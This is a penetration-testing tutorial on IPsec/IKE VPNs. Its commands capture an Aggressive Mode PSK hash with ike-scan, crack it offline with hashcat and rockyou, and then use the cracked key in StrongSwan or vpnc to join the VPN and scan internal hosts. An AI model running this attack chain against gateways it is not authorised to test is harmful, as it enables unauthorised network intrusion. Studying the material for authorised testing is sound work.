# Pentesting IPsec/IKE

**Ports:** UDP 500 (IKE), UDP 4500 (NAT-T IKE)

IPsec VPNs use Internet Key Exchange (IKE) to negotiate the tunnel's keys. An IKEv1 gateway that accepts Aggressive Mode with pre-shared-key authentication hands an unauthenticated client a hash derived from the PSK, which can then be cracked offline.

***

## Discovery

```bash
# UDP scan for IKE
nmap -sU -p 500,4500 $ip

# Service version
nmap -sU -p 500 -sV $ip
```

***

## ike-scan

Primary tool for IKE enumeration and attacks.

```bash
# Install
sudo apt install ike-scan
```

### Basic Enumeration

```bash
# Check if IKE is running (Main Mode)
ike-scan -M $ip
```

**Output interpretation:**

| Result                                    | Meaning                                       |
| ----------------------------------------- | --------------------------------------------- |
| `1 returned handshake; 0 returned notify` | Target is IPsec gateway, willing to negotiate |
| `0 returned handshake; 1 returned notify` | None of proposed transforms acceptable        |
| `0 returned handshake; 0 returned notify` | Not an IPsec gateway                          |

### Vendor Identification

```bash
# Fingerprint vendor via backoff timing
ike-scan -M --showbackoff $ip
```

***

## Aggressive Mode Attack (PSK Extraction)

Aggressive Mode is weak by design: the responder sends its authentication hash (derived from the PSK and the exchange parameters) before the initiator has proven anything, so the hash can be captured by anyone who completes the first exchange and cracked offline.

```bash
# Aggressive mode with fake ID (extracts hash if server responds)
ike-scan -P -M -A -n fakeID $ip
```

**Key output to look for:**

* `ID(Type=ID_USER_FQDN, Value=...)`: reveals the gateway's group name/ID
* `Hash(20 bytes)`: the responder's authentication hash to crack (20 bytes means SHA1, 16 bytes means MD5; see the hashcat modes below)

### Full PSK Hash Extraction

```bash
# -P (--pskcrack) prints the crackable parameter line; -Pike.psk writes it to a file instead
ike-scan -P -M -A -n fakeID $ip
```

The output contains IKE PSK parameters in this format:

```
g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r
```

Save the entire parameter string to a file for cracking.

### Note on Fake Hashes

> If a hash is returned even for a fake ID, the gateway may be sending a bogus hash for any ID (a deliberate countermeasure against offline PSK cracking). Only a successful crack confirms the hash was real.

***

## Cracking IKE-PSK Hash

```bash
# Identify hash type
hashcat --identify hash.txt
# Output: 5400 | IKE-PSK SHA1

# Crack with rockyou
hashcat -a 0 -m 5400 hash.txt /usr/share/wordlists/rockyou.txt

# MD5 variant
hashcat -a 0 -m 5300 hash.txt /usr/share/wordlists/rockyou.txt
```

### Hashcat IKE Modes

| Mode | Description  |
| ---- | ------------ |
| 5300 | IKE-PSK MD5  |
| 5400 | IKE-PSK SHA1 |
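Before spending GPU time, it is worth checking that the saved parameter line is well formed and matches the mode you pass to hashcat. The following is an added example (not ike-scan's or hashcat's own code) that parses the `g_xr:...:hash_r` record shown above, validates each field, and derives the hashcat mode and likely DH group from the field lengths; the sample line is constructed, not a real capture.

```python
# Sanity-check an ike-scan -P parameter line and pick the matching hashcat mode.
import re

# Field order exactly as ike-scan prints it with -P.
FIELDS = ["g_xr", "g_xi", "cky_r", "cky_i", "sai_b", "idir_b", "ni_b", "nr_b", "hash_r"]
HEX_RE = re.compile(r"^(?:[0-9a-fA-F]{2})+$")

# hash_r is an HMAC over the handshake, so its length identifies the PRF.
HASH_TO_MODE = {16: 5300, 20: 5400}          # MD5 -> 5300, SHA1 -> 5400
# DH public value length (bytes) -> IKE group number from the transform table.
DH_LEN_TO_GROUP = {96: 1, 128: 2, 192: 5}    # MODP768, MODP1024, MODP1536

def parse_psk_line(line: str) -> dict:
    """Split one ike-scan -P line into raw bytes per field, rejecting malformed input."""
    parts = line.strip().split(":")
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} fields, got {len(parts)}")
    rec = {}
    for name, value in zip(FIELDS, parts):
        if not HEX_RE.match(value):
            raise ValueError(f"{name}: not even-length hex")
        rec[name] = bytes.fromhex(value)
    for cky in ("cky_r", "cky_i"):           # ISAKMP cookies are always 8 bytes
        if len(rec[cky]) != 8:
            raise ValueError(f"{cky}: expected 8 bytes, got {len(rec[cky])}")
    if len(rec["g_xr"]) != len(rec["g_xi"]):  # both sides use the same DH group
        raise ValueError("g_xr and g_xi lengths differ")
    return rec

def hashcat_mode(rec: dict) -> int:
    """5300 for a 16-byte (MD5) hash_r, 5400 for a 20-byte (SHA1) one."""
    try:
        return HASH_TO_MODE[len(rec["hash_r"])]
    except KeyError:
        raise ValueError(f"unexpected hash_r length {len(rec['hash_r'])}") from None

def dh_group(rec: dict):
    """Guess the MODP group number from the DH public value size (None if unknown)."""
    return DH_LEN_TO_GROUP.get(len(rec["g_xr"]))

# Constructed sample: a MODP1024 exchange (128-byte DH values) with a SHA1 hash.
SAMPLE_LINE = ":".join([
    "aa" * 128, "bb" * 128, "c0" * 8, "c1" * 8,
    "0a" * 40, "0b" * 12, "0c" * 20, "0d" * 20, "ee" * 20,
])

if __name__ == "__main__":
    r = parse_psk_line(SAMPLE_LINE)
    print(f"hashcat -m {hashcat_mode(r)}  (DH group {dh_group(r)})")
```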

***

## Transform Enumeration

If default transforms fail, enumerate acceptable ones:

```bash
# Try different encryption/hash combos
ike-scan -M --trans=5,2,1,2 $ip  # 3DES, SHA1, MODP1024, PSK
ike-scan -M --trans=7,2,1,2 $ip  # AES-128, SHA1, MODP1024, PSK
ike-scan -M --trans=7/256,2,1,2 $ip  # AES-256
```

### Transform Format

`--trans=enc,hash,auth,group`

| Encryption | Hash     | Auth          | Group        |
| ---------- | -------- | ------------- | ------------ |
| 5 = 3DES   | 1 = MD5  | 1 = PSK       | 1 = MODP768  |
| 7 = AES    | 2 = SHA1 | 2 = RSA       | 2 = MODP1024 |
|            |          | 64221 = XAUTH | 5 = MODP1536 |

***

## Connecting to VPN

Once you have a valid PSK (and, for XAUTH gateways, a username and password):

### StrongSwan

```bash
# Install
sudo apt install strongswan

# Config files:
#   /etc/ipsec.conf     - connection definitions
#   /etc/ipsec.secrets  - pre-shared keys and other secrets
```

Example `/etc/ipsec.secrets`:

```
%any : PSK "cracked_password_here"
```

### vpnc

```bash
sudo apt install vpnc

# Create config
sudo vim /etc/vpnc/vpn.conf
```

Example config:

```
IPSec gateway TARGET_IP
IPSec ID group_name
IPSec secret cracked_psk
Xauth username username_here
Xauth password password_here
```

Connect:

```bash
sudo vpnc /etc/vpnc/vpn.conf
```

***

## Post-Connection

After VPN connection:

```bash
# Check new interface
ip addr

# Re-scan internal network
nmap -sC -sV TARGET_INTERNAL_IP
```

***

## References

* <https://book.hacktricks.xyz/network-services-pentesting/ipsec-ike-vpn-pentesting>
* ike-scan documentation
